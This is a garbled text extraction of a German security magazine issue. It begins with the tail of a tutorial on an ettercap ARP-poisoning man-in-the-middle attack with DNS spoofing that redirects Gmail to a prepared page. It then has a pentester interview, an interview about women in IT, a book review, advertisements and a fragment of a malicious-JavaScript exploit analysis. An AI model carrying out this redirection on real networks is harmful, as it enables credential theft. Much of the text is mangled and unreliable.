entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
